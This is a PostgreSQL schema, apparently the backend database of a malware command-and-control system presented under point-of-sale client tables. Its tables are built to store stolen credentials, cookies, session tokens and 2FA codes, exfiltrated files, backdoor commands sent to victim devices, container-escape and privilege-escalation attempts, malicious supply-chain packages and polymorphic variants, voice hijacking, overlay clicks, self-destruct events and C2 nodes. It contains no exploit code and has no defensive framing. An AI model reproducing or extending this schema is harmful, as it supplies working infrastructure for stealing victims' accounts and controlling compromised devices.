CREATE TABLE pos_clients(entry_id SERIAL PRIMARY KEY,client_serial TEXT UNIQUE NOT NULL,hardware_uuid TEXT,last_ping TIMESTAMP WITH TIME ZONE DEFAULT now(),operational_status TEXT DEFAULT 'online',device_config JSONB,registered_on TIMESTAMP WITH TIME ZONE DEFAULT now());
CREATE TABLE service_requests(ticket_id SERIAL PRIMARY KEY,target_client TEXT REFERENCES pos_clients(client_serial) ON DELETE CASCADE,request_type TEXT NOT NULL,request_data TEXT,ticket_status TEXT DEFAULT 'open',resolution_log JSONB,opened_at TIMESTAMP WITH TIME ZONE DEFAULT now(),last_updated TIMESTAMP WITH TIME ZONE DEFAULT now());
CREATE TABLE device_keys(device_id TEXT PRIMARY KEY,shared_key_enc TEXT NOT NULL,expiry BIGINT NOT NULL);
CREATE TABLE stolen_cookies(id SERIAL PRIMARY KEY,device_id TEXT NOT NULL,cookies JSONB NOT NULL,timestamp TIMESTAMP WITH TIME ZONE DEFAULT now());
CREATE TABLE exfil(id SERIAL PRIMARY KEY,device_id TEXT NOT NULL,file_path TEXT NOT NULL,uploaded_at TIMESTAMP WITH TIME ZONE DEFAULT now());
CREATE TABLE error_logs(log_id SERIAL PRIMARY KEY,logged_at TIMESTAMP WITH TIME ZONE DEFAULT now(),error_payload JSONB NOT NULL);
CREATE TABLE ai_tasks(task_id SERIAL PRIMARY KEY,agent_type TEXT NOT NULL,device_id TEXT,target TEXT,task_parameters JSONB,status TEXT DEFAULT 'pending',result JSONB,created_at TIMESTAMP WITH TIME ZONE DEFAULT now(),updated_at TIMESTAMP WITH TIME ZONE DEFAULT now());
CREATE TABLE ai_results(result_id SERIAL PRIMARY KEY,task_id INTEGER REFERENCES ai_tasks(task_id) ON DELETE CASCADE,result_type TEXT,result_data JSONB NOT NULL,confidence FLOAT,created_at TIMESTAMP WITH TIME ZONE DEFAULT now());
CREATE TABLE stolen_credentials(cred_id SERIAL PRIMARY KEY,device_id TEXT NOT NULL,source TEXT NOT NULL,username TEXT,password TEXT,token TEXT,cookie_data JSONB,two_fa_code TEXT,phone_number TEXT,timestamp TIMESTAMP WITH TIME ZONE DEFAULT now(),forwarded_to_server BOOLEAN DEFAULT false);
CREATE TABLE stolen_sessions(session_id SERIAL PRIMARY KEY,device_id TEXT NOT NULL,platform TEXT NOT NULL,session_token TEXT NOT NULL,cookie_json JSONB,expires_at TIMESTAMP WITH TIME ZONE,stolen_at TIMESTAMP WITH TIME ZONE DEFAULT now(),last_used TIMESTAMP WITH TIME ZONE);
CREATE TABLE nearby_device_scans(scan_id SERIAL PRIMARY KEY,device_id TEXT NOT NULL,scan_type TEXT NOT NULL,scan_data JSONB NOT NULL,scan_time TIMESTAMP WITH TIME ZONE DEFAULT now(),processed BOOLEAN DEFAULT false);
CREATE TABLE container_escape_logs(log_id SERIAL PRIMARY KEY,device_id TEXT NOT NULL,container_type TEXT,attempted_at TIMESTAMP WITH TIME ZONE DEFAULT now(),success BOOLEAN DEFAULT false,method TEXT,output TEXT);
CREATE TABLE privilege_escalation_logs(log_id SERIAL PRIMARY KEY,device_id TEXT NOT NULL,attempted_at TIMESTAMP WITH TIME ZONE DEFAULT now(),method TEXT,success BOOLEAN DEFAULT false,new_privileges TEXT);
CREATE TABLE backdoor_commands(cmd_id SERIAL PRIMARY KEY,device_id TEXT NOT NULL,command TEXT NOT NULL,issued_at TIMESTAMP WITH TIME ZONE DEFAULT now(),executed BOOLEAN DEFAULT false,executed_at TIMESTAMP WITH TIME ZONE,result TEXT);
CREATE TABLE supply_chain_attacks(attack_id SERIAL PRIMARY KEY,campaign_name TEXT,target_platform TEXT,malicious_package_name TEXT,package_url TEXT,description TEXT,deployed_at TIMESTAMP WITH TIME ZONE DEFAULT now(),status TEXT DEFAULT 'active');
CREATE TABLE darkweb_intel(intel_id SERIAL PRIMARY KEY,source TEXT,content_type TEXT,content TEXT,discovered_at TIMESTAMP WITH TIME ZONE DEFAULT now(),relevance_score FLOAT);
CREATE TABLE self_destruct_logs(log_id SERIAL PRIMARY KEY,device_id TEXT NOT NULL,triggered_at TIMESTAMP WITH TIME ZONE DEFAULT now(),reason TEXT,success BOOLEAN DEFAULT false);
CREATE TABLE polymorphic_variants(variant_id SERIAL PRIMARY KEY,original_package_name TEXT,new_package_name TEXT NOT NULL,variant_hash TEXT UNIQUE NOT NULL,created_at TIMESTAMP WITH TIME ZONE DEFAULT now(),deployed_to JSONB);
CREATE TABLE overlay_clicks(click_id SERIAL PRIMARY KEY,device_id TEXT NOT NULL,target_button TEXT,timestamp TIMESTAMP WITH TIME ZONE DEFAULT now());
CREATE TABLE voice_hijack_logs(log_id SERIAL PRIMARY KEY,device_id TEXT NOT NULL,command TEXT,executed BOOLEAN DEFAULT false,timestamp TIMESTAMP WITH TIME ZONE DEFAULT now());
CREATE TABLE power_settings(device_id TEXT PRIMARY KEY,battery_saver_mode BOOLEAN DEFAULT false,wifi_only BOOLEAN DEFAULT false,heartbeat_interval INTEGER DEFAULT 30,last_updated TIMESTAMP WITH TIME ZONE DEFAULT now());
CREATE TABLE c2_nodes(node_id SERIAL PRIMARY KEY,node_type TEXT NOT NULL,node_address TEXT NOT NULL,public_key TEXT,status TEXT DEFAULT 'active',last_seen TIMESTAMP WITH TIME ZONE DEFAULT now());
CREATE INDEX idx_service_requests_target_client ON service_requests(target_client);
CREATE INDEX idx_service_requests_status ON service_requests(ticket_status);
CREATE INDEX idx_stolen_cookies_device_id ON stolen_cookies(device_id);
CREATE INDEX idx_error_logs_logged_at ON error_logs(logged_at);
CREATE INDEX idx_ai_tasks_device_id ON ai_tasks(device_id);
CREATE INDEX idx_ai_tasks_status ON ai_tasks(status);
CREATE INDEX idx_ai_results_task_id ON ai_results(task_id);
CREATE INDEX idx_stolen_credentials_device_id ON stolen_credentials(device_id);
CREATE INDEX idx_stolen_credentials_source ON stolen_credentials(source);
CREATE INDEX idx_stolen_sessions_device_id ON stolen_sessions(device_id);
CREATE INDEX idx_stolen_sessions_platform ON stolen_sessions(platform);
CREATE INDEX idx_nearby_device_scans_device_id ON nearby_device_scans(device_id);
CREATE INDEX idx_container_escape_logs_device_id ON container_escape_logs(device_id);
CREATE INDEX idx_privilege_escalation_logs_device_id ON privilege_escalation_logs(device_id);
CREATE INDEX idx_backdoor_commands_device_id ON backdoor_commands(device_id);
CREATE INDEX idx_darkweb_intel_content_type ON darkweb_intel(content_type);
CREATE INDEX idx_self_destruct_logs_device_id ON self_destruct_logs(device_id);
CREATE INDEX idx_overlay_clicks_device_id ON overlay_clicks(device_id);
CREATE INDEX idx_voice_hijack_logs_device_id ON voice_hijack_logs(device_id);